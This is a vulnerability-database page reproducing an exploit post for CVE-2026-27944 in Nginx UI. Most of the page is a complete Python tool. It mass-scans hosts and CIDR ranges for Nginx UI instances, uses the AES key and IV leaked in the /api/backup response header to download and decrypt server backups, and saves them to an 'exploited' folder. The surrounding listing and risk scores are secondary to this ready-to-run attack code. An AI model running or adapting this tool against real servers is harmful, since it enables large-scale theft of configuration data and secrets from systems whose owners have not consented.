Vulners
Lucene search
📄 Nginx UI 2.3.3 Backup Decryption Mass Scanner
| Reporter | Title | Published | Views | Family All 146 |
|---|---|---|---|---|
 | Exploit for CVE-2026-27944 | 10 Mar 202614:05 | – | githubexploit |
| Exploit for Missing Encryption of Sensitive Data in Nginxui Nginx_Ui | 14 Mar 202602:43 | – | githubexploit |
| Exploit for CVE-2026-27944 | 10 Mar 202611:23 | – | githubexploit |
| Exploit for Missing Authentication for Critical Function in Nginxui Nginx_Ui | 18 Apr 202611:48 | – | githubexploit |
| Exploit for Missing Authentication for Critical Function in Nginxui Nginx_Ui | 7 May 202621:12 | – | githubexploit |
| Exploit for CVE-2026-27944 | 10 Mar 202615:14 | – | githubexploit |
| Exploit for Missing Authentication for Critical Function in Nginxui Nginx_Ui | 17 Apr 202610:41 | – | githubexploit |
| Exploit for Missing Encryption of Sensitive Data in Nginxui Nginx_Ui | 14 Mar 202602:43 | – | githubexploit |
| Exploit for Missing Authentication for Critical Function in Nginxui Nginx_Ui | 7 May 202621:12 | – | githubexploit |
 | CVE-2026-27944 | 5 Mar 202616:28 | – | attackerkb |
10
=============================================================================================================================================
| # Title : Nginx UI 2.3.3 Mass Scanner and Backup Decryption Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://nginx.org/ |
=============================================================================================================================================
[+] Summary : This Python tool is a multi‑threaded scanner and exploitation utility designed to identify and validate the vulnerability CVE-2026-27944 affecting Nginx UI versions ≤ 2.3.2.
The script supports scanning single hosts, CIDR ranges, or target lists, and checks multiple common web service ports. It fingerprints Nginx UI instances by analyzing page content, HTTP headers, and the /api/version endpoint.
When a target is identified as Nginx UI, the scanner checks the /api/backup endpoint for the presence of the X-Backup-Security HTTP header, which contains a Base64‑encoded AES key and IV used to encrypt backup archives. Because the cryptographic material is disclosed in the response headers, the script can retrieve the encrypted backup and decrypt it automatically.
Main Capabilities
Multi‑threaded mass scanning engine for large network ranges
Automatic Nginx UI detection using HTML and header fingerprints
Version comparison to detect potentially vulnerable versions
Direct vulnerability confirmation via /api/backup endpoint
Automated exploit module that downloads and decrypts the backup
JSON output for scan results and analysis
[+] POC : >python 1.py --target https://127.0.0.1
#!/usr/bin/env python3
import argparse
import base64
import os
import json
import ipaddress
import threading
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urljoin, urlparse
import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
VULN_VERSION_MAX = "2.3.2"
DEFAULT_PORTS = [80,443,8080,8443,9000,9001,9080]
def version_leq(v1,v2):
try:
a=[int(x) for x in v1.split(".")]
b=[int(x) for x in v2.split(".")]
length=max(len(a),len(b))
a+= [0]*(length-len(a))
b+= [0]*(length-len(b))
return a<=b
except:
return False
def create_session():
s=requests.Session()
retry=Retry(
total=2,
backoff_factor=0.3,
status_forcelist=[500,502,503,504]
)
adapter=HTTPAdapter(max_retries=retry)
s.mount("http://",adapter)
s.mount("https://",adapter)
s.headers.update({
"User-Agent":"Mozilla/5.0"
})
return s
def expand_targets(file,cidr,target,ports):
targets=[]
if target:
targets.append((target,ports))
if cidr:
net=ipaddress.ip_network(cidr,strict=False)
for ip in net.hosts():
targets.append((str(ip),ports))
if file:
with open(file) as f:
for line in f:
line=line.strip()
if line:
targets.append((line,ports))
return targets
def detect_nginx_ui(host,port,ssl=False):
proto="https" if ssl else "http"
url=f"{proto}://{host}:{port}"
session=create_session()
result={
"url":url,
"host":host,
"port":port,
"version":None,
"is_ui":False,
"is_vuln":False,
"confidence":0
}
try:
r=session.get(url,timeout=5,verify=False)
if "<title>Nginx UI</title>" in r.text:
result["confidence"]+=40
if "nginx-ui" in r.text.lower():
result["confidence"]+=20
server=r.headers.get("Server","")
if "nginx" in server.lower():
result["confidence"]+=5
try:
vr=session.get(f"{url}/api/version",timeout=5,verify=False)
if vr.status_code==200:
data=vr.json()
if "version" in data:
result["version"]=data["version"]
if version_leq(result["version"],VULN_VERSION_MAX):
result["is_vuln"]=True
result["confidence"]+=30
except:
pass
try:
br=session.head(f"{url}/api/backup",timeout=5,verify=False)
if br.status_code==200 and "X-Backup-Security" in br.headers:
result["is_ui"]=True
result["is_vuln"]=True
result["confidence"]=100
except:
pass
if result["confidence"]>=50:
result["is_ui"]=True
except:
pass
return result
def mass_scan(targets,threads):
results=[]
vuln=[]
lock=threading.Lock()
total=len(targets)
counter=0
def worker(target):
nonlocal counter
host,ports=target
for port in ports:
for ssl in [False,True]:
r=detect_nginx_ui(host,port,ssl)
with lock:
counter+=1
print(f"\rScanned {counter}",end="")
if r["is_ui"]:
results.append(r)
if r["is_vuln"]:
vuln.append(r)
with ThreadPoolExecutor(max_workers=threads) as exe:
exe.map(worker,targets)
print()
return results,vuln
def fast_exploit(url):
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
session=create_session()
try:
endpoint=urljoin(url+"/","api/backup")
head=session.head(endpoint,timeout=5)
if "X-Backup-Security" not in head.headers:
print("Target not vulnerable")
return
header=head.headers["X-Backup-Security"]
parts=header.split(":")
if len(parts)!=2:
print("Invalid header")
return
key=base64.b64decode(parts[0])
iv=base64.b64decode(parts[1])
r=session.get(endpoint)
cipher=AES.new(key,AES.MODE_CBC,iv)
data=unpad(cipher.decrypt(r.content),16)
os.makedirs("exploited",exist_ok=True)
name=urlparse(url).netloc.replace(":","_")
path=f"exploited/{name}.zip"
open(path,"wb").write(data)
print("Backup saved:",path)
except Exception as e:
print("Exploit failed:",e)
def main():
parser=argparse.ArgumentParser()
parser.add_argument("--cidr")
parser.add_argument("--file")
parser.add_argument("--target")
parser.add_argument("--threads",type=int,default=100)
parser.add_argument("--ports",default=",".join(map(str,DEFAULT_PORTS)))
parser.add_argument("--exploit")
args=parser.parse_args()
if args.exploit:
fast_exploit(args.exploit)
return
ports=[int(x) for x in args.ports.split(",")]
targets=expand_targets(args.file,args.cidr,args.target,ports)
if not targets:
print("No targets specified")
return
results,vuln=mass_scan(targets,args.threads)
json.dump(results,open("scan_results.json","w"),indent=2)
print("Found UI:",len(results))
print("Vulnerable:",len(vuln))
if __name__=="__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Mar 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.19.8
EPSS0.22162
SSVC